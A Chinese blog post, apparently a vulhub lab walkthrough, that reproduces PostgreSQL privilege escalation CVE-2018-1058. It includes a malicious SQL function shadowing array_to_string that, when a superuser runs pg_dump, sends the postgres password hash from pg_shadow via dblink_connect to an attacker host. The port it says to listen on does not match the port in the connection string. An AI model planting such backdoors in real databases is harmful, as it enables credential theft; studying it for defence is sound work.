PostgreSQL 提权漏洞(CVE-2018-1058)


PostgreSQL 提权漏洞(CVE-2018-1058)

PostgreSQL 是一款关系型数据库。其 9.3 到 10 版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

漏洞复现

先通过普通用户 vulhub:vulhub 的身份登录 postgres: psql --host your-ip --username vulhub

执行如下语句后退出:

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

然后我在 10.0.0.1 上监听 2333 端口,等待超级用户触发我们留下的这个 后门

在靶场机器下,用超级用户的身份执行 pg_dump 命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出 vulhub 这个数据库的内容。

执行上述命令的同时,后门 已被触发,10.0.0.1 机器上已收到敏感信息:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)phpMyAdmin 是一套开源的、基于 Web 的 MySQL 数据库管理工具。其 index.php 中存在一处文件包含逻辑,通过二次编码即可绕过检查,造
2019-03-04
下一篇 
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)PostgreSQL 是一款关系型数据库。其 9.3 到 11 版本中存在一处 特性,管理员或具有 COPY TO/FROM PROGRAM 权限的用户,可以使用这个特性
2019-03-03
  目录